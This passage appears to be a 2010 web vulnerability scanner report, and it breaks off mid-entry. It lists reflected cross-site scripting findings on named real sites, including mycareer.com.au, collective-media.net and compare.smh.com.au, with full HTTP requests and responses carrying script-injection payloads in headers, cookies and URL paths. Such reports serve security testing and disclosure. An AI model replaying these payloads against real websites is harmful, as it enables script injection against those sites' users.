The value of the User-Agent HTTP header is copied into an HTML comment. The payload 3dd4b--><script>alert(1)</script>19ef953a0d0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /7748366 HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3dd4b--><script>alert(1)</script>19ef953a0d0
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71617
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=dyweduq0aym2m4nclltwgh55; path=/; HttpOnly
Set-Cookie: jobHistory=7748366; domain=mycareer.com.au; path=/
Date: Mon, 22 Nov 2010 23:35:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:35:05 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3dd4b--><script>alert(1)</script>19ef953a0d0
MYC Server Status: OK
-->

2.103. http://mycareer.com.au/7748561 [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/7748561

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a0efe--><script>alert(1)</script>43db199536 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /7748561 HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a0efe--><script>alert(1)</script>43db199536
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58912
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zl0qit453ppfan55ad1wi055; path=/; HttpOnly
Set-Cookie: jobHistory=7748561; domain=mycareer.com.au; path=/
Date: Mon, 22 Nov 2010 23:35:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:35:01 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a0efe--><script>alert(1)</script>43db199536
MYC Server Status: OK
-->

2.104. http://mycareer.com.au/jobs [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/jobs

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload e8099--><script>alert(1)</script>3c2d803a417 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jobs HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e8099--><script>alert(1)</script>3c2d803a417
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 102099
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ydfolyi0dugybx55j2sdrx55; path=/; HttpOnly
Date: Mon, 22 Nov 2010 23:34:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:34:54 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e8099--><script>alert(1)</script>3c2d803a417
MYC Server Status: OK
-->

2.105. http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.361/L12_4858519

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0b4'%3balert(1)//e42f9eb3457 was submitted in the cli cookie. This input was echoed as 4a0b4';alert(1)//e42f9eb3457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/bzo.361/L12_4858519 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d4a0b4'%3balert(1)//e42f9eb3457; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7086
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-91936289_1290468919","http://ad.doubleclick.net//bzo.361/L12_4858519;net=bzo;u=,bzo-91936289_1290468919,11bbcecf1d09b9d4a0b4';alert(1)//e42f9eb3457,none,;;contx=none;dc=d;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

2.106. http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/cmadj/bzo.361/L2_4985265

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36dc2'%3balert(1)//a7a6e6853d7 was submitted in the cli cookie. This input was echoed as 36dc2';alert(1)//a7a6e6853d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/bzo.361/L2_4985265 HTTP/1.1
Host: b.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d36dc2'%3balert(1)//a7a6e6853d7; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 22 Nov 2010 23:35:57 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7085

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-56242429_1290468957","http://ad.doubleclick.net//bzo.361/L2_4985265;net=bzo;u=,bzo-56242429_1290468957,11bbcecf1d09b9d36dc2';alert(1)//a7a6e6853d7,none,;;contx=none;dc=d;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

2.107. http://compare.smh.com.au/activity/record_gts2 [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/activity/record_gts2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4f5"><script>alert(1)</script>cd7cb0b617a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /activity7f4f5"><script>alert(1)</script>cd7cb0b617a/record_gts2 HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:18 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01237
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/activity7f4f5"><script>alert(1)</script>cd7cb0b617a/record_gts2
Content-Length: 151
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/activity7f4f5"><script>alert(1)</script>cd7cb0b617a/record_gts2">redirected</a>.</body></html>

2.108. http://compare.smh.com.au/activity/record_gts2 [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/activity/record_gts2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f6a2"><script>alert(1)</script>3ab65c0c667 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /activity/record_gts22f6a2"><script>alert(1)</script>3ab65c0c667 HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:22 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/activity/record_gts22f6a2"><script>alert(1)</script>3ab65c0c667
Content-Length: 151
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/activity/record_gts22f6a2"><script>alert(1)</script>3ab65c0c667">redirected</a>.</body></html>

2.109. http://compare.smh.com.au/activity/record_sl [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/activity/record_sl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecba"><script>alert(1)</script>c3512109446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /activity3ecba"><script>alert(1)</script>c3512109446/record_sl HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:19 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01293
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/activity3ecba"><script>alert(1)</script>c3512109446/record_sl
Content-Length: 149
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/activity3ecba"><script>alert(1)</script>c3512109446/record_sl">redirected</a>.</body></html>

2.110. http://compare.smh.com.au/activity/record_sl [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/activity/record_sl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595b9"><script>alert(1)</script>affb982890c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /activity/record_sl595b9"><script>alert(1)</script>affb982890c HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:23 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/activity/record_sl595b9"><script>alert(1)</script>affb982890c
Content-Length: 149
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/activity/record_sl595b9"><script>alert(1)</script>affb982890c">redirected</a>.</body></html>

2.111. http://compare.smh.com.au/business/key-leaders/ [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/business/key-leaders/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede33"><script>alert(1)</script>a9f452ffbb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /businessede33"><script>alert(1)</script>a9f452ffbb3/key-leaders/ HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:02 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01842
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/businessede33"><script>alert(1)</script>a9f452ffbb3/key-leaders
Content-Length: 151
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/businessede33"><script>alert(1)</script>a9f452ffbb3/key-leaders">redirected</a>.</body></html>

2.112. http://compare.smh.com.au/business/key-leaders/ [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/business/key-leaders/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29c60"><script>alert(1)</script>71e86b344d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /business/key-leaders29c60"><script>alert(1)</script>71e86b344d2/ HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:07 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01278
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/business/key-leaders29c60"><script>alert(1)</script>71e86b344d2
Content-Length: 151
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/business/key-leaders29c60"><script>alert(1)</script>71e86b344d2">redirected</a>.</body></html>

2.113. http://compare.smh.com.au/home-loans [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/home-loans

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39e80"><script>alert(1)</script>1a19ca1e996 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /home-loans39e80"><script>alert(1)</script>1a19ca1e996 HTTP/1.1
Host: compare.smh.com.au
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290467844652

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:03:55 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01762
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=aedce7ade6ceac88a7a0fe0095a0e6dd; path=/
Location: http://www.smh.com.au/home-loans39e80"><script>alert(1)</script>1a19ca1e996
Status: 302 Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 141

<html><body>You are being <a href="http://www.smh.com.au/home-loans39e80"><script>alert(1)</script>1a19ca1e996">redirected</a>.</body></html>

2.114. http://compare.smh.com.au/javascripts/base_fairfax_6894.js [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/base_fairfax_6894.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7aa"><script>alert(1)</script>e711de5a08a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascriptsbc7aa"><script>alert(1)</script>e711de5a08a/base_fairfax_6894.js HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:30 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01354
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascriptsbc7aa"><script>alert(1)</script>e711de5a08a/base_fairfax_6894.js
Content-Length: 163
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascriptsbc7aa"><script>alert(1)</script>e711de5a08a/base_fairfax_6894.js">redirected</a>.</body></html>

2.115. http://compare.smh.com.au/javascripts/base_fairfax_6894.js [REST URL parameter 2] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/base_fairfax_6894.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85eb9"><script>alert(1)</script>b3c69df8453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /javascripts/base_fairfax_6894.js85eb9"><script>alert(1)</script>b3c69df8453 HTTP/1.1
Host: compare.smh.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=1.1290467888.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1290467844652; s_sq=%5B%5BB%5D%5D; __utma=1.407473643.1290467888.1290467888.1290467888.1; __utmc=1; _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; __utmb=1.2.10.1290467888;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:04:34 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 SVN/1.5.5 Phusion_Passenger/2.2.15 PHP/5.1.6
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.01421
Cache-Control: no-cache
Set-Cookie: _Mozo_session_id=2409697fd00bbe0551b244f62a12edb7; path=/
Location: http://www.smh.com.au/javascripts/base_fairfax_6894.js85eb9"><script>alert(1)</script>b3c69df8453
Content-Length: 163
Status: 302 Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.smh.com.au/javascripts/base_fairfax_6894.js85eb9"><script>alert(1)</script>b3c69df8453">redirected</a>.</body></html>

2.116. http://compare.smh.com.au/javascripts/fabtabulous.js [REST URL parameter 1] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://compare.smh.com.au
Path:	/javascripts/fabtabulous.js

Issue detail

